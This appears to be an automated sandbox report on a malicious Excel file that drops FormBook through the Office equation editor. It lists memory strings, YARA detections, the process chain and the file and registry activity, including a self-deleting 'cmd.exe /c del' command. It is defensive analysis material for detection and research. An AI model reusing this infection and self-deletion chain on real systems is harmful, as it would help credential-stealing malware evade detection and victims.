      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
      Source: explorer.exe, 00000007.00000000.2195506966.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
      Source: vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpString found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000007.00000000.2187709209.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara match; File source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exe; Memory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe; Memory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe; Memory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exe; Memory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025A3A838_2_025A3A83
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02517B008_2_02517B00
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0257DBDA8_2_0257DBDA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EFBD78_2_024EFBD7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0259CBA48_2_0259CBA4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FC85C8_2_024FC85C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0251286D8_2_0251286D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0258F8EE8_2_0258F8EE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025759558_2_02575955
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025069FE8_2_025069FE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0259098E8_2_0259098E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F29B28_2_024F29B2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0250EE4C8_2_0250EE4C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02522E2F8_2_02522E2F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0251DF7C8_2_0251DF7C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02500F3F8_2_02500F3F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FCD5B8_2_024FCD5B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02520D3B8_2_02520D3B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0258FDDD8_2_0258FDDD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BC75F8_2_000BC75F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A8C5B8_2_000A8C5B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A8C608_2_000A8C60
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A2D878_2_000A2D87
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A2D908_2_000A2D90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A2FB08_2_000A2FB0
      Source: Form BA.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CDF970 appears 48 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00C6DF5C appears 72 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CB373B appears 132 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CB3F92 appears 63 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 024EE2A8 appears 38 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0255F970 appears 81 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02533F92 appears 108 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0253373B appears 238 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 024EDF5C appears 112 times
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: pool[1].exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: vbc.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: pool[1].exe.3.dr, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: vbc.exe.3.dr, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 5.0.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 6.2.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 6.0.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@10/19@4/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Form BA.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDD82.tmpJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Form BA.xlsxVirustotal: Detection: 31%
      Source: Form BA.xlsxReversingLabs: Detection: 30%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: Form BA.xlsxStatic file information: File size 1277440 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: wntdll.pdb source: vbc.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: vbc.exe, 00000006.00000002.2243369456.0000000000896000.00000004.00000020.sdmp
      Source: Form BA.xlsxInitial sample: OLE indicators vbamacros = False
      Source: Form BA.xlsxInitial sample: OLE indicators encrypted = True
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0027951F push 72060001h; retf 0016h6_2_00279525
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004199C4 push si; iretd 6_2_004199C8
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004151D2 push eax; retf 6_2_004151D3
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00419BB5 push ss; ret 6_2_00419BB6
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B3B5 push eax; ret 6_2_0041B408
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B46C push eax; ret 6_2_0041B472
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B402 push eax; ret 6_2_0041B408
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B40B push eax; ret 6_2_0041B472
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004155A9 push ss; iretd 6_2_004155AA
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CECD pushad ; retf 6_2_0041CECF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EDFA1 push ecx; ret 8_2_024EDFB4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B51D2 push eax; retf 8_2_000B51D3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB3B5 push eax; ret 8_2_000BB408
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB40B push eax; ret 8_2_000BB472
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB402 push eax; ret 8_2_000BB408
